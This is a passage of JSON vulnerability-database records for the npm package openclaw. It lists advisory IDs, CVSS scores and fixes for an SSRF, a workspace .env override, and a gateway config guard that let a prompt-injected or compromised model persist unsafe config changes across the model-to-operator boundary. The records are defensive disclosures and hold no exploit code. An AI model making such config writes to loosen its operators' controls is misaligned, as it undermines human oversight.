ility":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-4jpw-hj22-2xmc"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ycse-95bv-7ua9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95220?format=json","vulnerability_id":"VCID-ye4t-n6r3-67ab","summary":"OpenClaw's gateway config mutation guard allowed unsafe model-driven config writes\n## Summary\n\nThe agent-facing `gateway` tool protects `config.apply` and `config.patch` with a model-to-operator trust boundary. That guard used a hand-maintained denylist of protected config paths. The config schema outgrew that denylist, leaving sensitive subtrees writable through model-driven gateway config mutations.\n\n## Impact\n\nA prompt-injected or otherwise compromised model running with access to the owner-only `gateway` tool could persist unsafe config changes that crossed security boundaries. Examples included config paths affecting command execution, network/proxy/TLS behavior, credential forwarding, telemetry or hook endpoints, memory/indexing surfaces, and operator policy controls. These changes could survive restart once written to config.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nOpenClaw replaced the denylist with a fail-closed allowlist. Agent-driven `gateway config.apply` and `gateway config.patch` now permit only narrow agent-tunable prompt/model settings and mention-gating paths. Other config changes are rejected before the gateway mutation RPC is invoked.\n\n## Fix Commit(s)\n\n- `bceda6089aa7b3695cc7696b43c61ae3d01bb0ec` (`fix(gateway): fail closed on runtime config edits`)\n\n## Severity\n\nSeverity remains `high`. The vulnerable entry point is owner-only, but the model/agent is not a trusted principal under OpenClaw's security model, and the guard is the explicit model-to-operator boundary for persisted config mutation.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/bceda6089aa7b3695cc7696b43c61ae3d01bb0ec","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/bceda6089aa7b3695cc7696b43c61ae3d01bb0ec"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwj3-vqpp-pmxr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwj3-vqpp-pmxr"},{"reference_url":"https://github.com/advisories/GHSA-cwj3-vqpp-pmxr","reference_id":"GHSA-cwj3-vqpp-pmxr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cwj3-vqpp-pmxr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114733?format=json","purl":"pkg:npm/openclaw@2026.4.23","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23"}],"aliases":["GHSA-cwj3-vqpp-pmxr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ye4t-n6r3-67ab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89627?format=json","vulnerability_id":"VCID-yhpq-5qy3-y7bn","summary":"OpenClaw: Workspace dotenv could override runtime-control environment variables\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nWorkspace `.env` loading did not reserve the `OPENCLAW_` runtime-control namespace broadly enough. A malicious workspace could set variables such as `OPENCLAW_GIT_DIR` before source-update or installer flows, potentially steering trusted OpenClaw runtime behavior.\n\nThis requires running OpenClaw from an attacker-controlled workspace. Severity is medium.\n\n## Fix\n\nOpenClaw now reserves the workspace `OPENCLAW_` environment namespace and rejects workspace dotenv entries for OpenClaw runtime-control variables.\n\nFix commit:\n\n- `018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44114","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06532","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.0653","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07178","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44114"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hxvm-xjvf-93f3","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hxvm-xjvf-93f3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44114","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44114"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-namespace-collision-via-workspace-dotenv","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-namespace-collision-via-workspace-dotenv"},{"reference_url":"https://github.com/advisories/GHSA-hxvm-xjvf-93f3","reference_id":"GHSA-hxvm-xjvf-93f3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hxvm-xjvf-93f3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-44114","GHSA-hxvm-xjvf-93f3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yhpq-5qy3-y7bn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90336?format=json","vulnerability_id":"VCID-ykwt-tdpa-3bft","summary":"OpenClaw: SSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery\n## Summary\nSSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Keep the shipped marketplace archive-fetch SSRF, but narrow out the Ollama half because it is operator-configured and overlaps weaker trust-model or duplicate SSRF ground.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8deb9522f3d2680820588b190adb4a2a52f3670b` — 2026-03-30T20:08:38+01:00\n\nOpenClaw thanks @tdjackey for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41302","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13336","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13378","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13373","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41302"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8deb9522f3d2680820588b190adb4a2a52f3670b","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8deb9522f3d2680820588b190adb4a2a52f3670b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q7v-8mr7-g23p","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q7v-8mr7-g23p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41302","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41302"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-fetch-in-marketplace-plugin-download","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-fetch-in-marketplace-plugin-download"},{"reference_url":"https://github.com/advisories/GHSA-9q7v-8mr7-g23p","reference_id":"GHSA-9q7v-8mr7-g23p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9q7v-8mr7-g23p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-z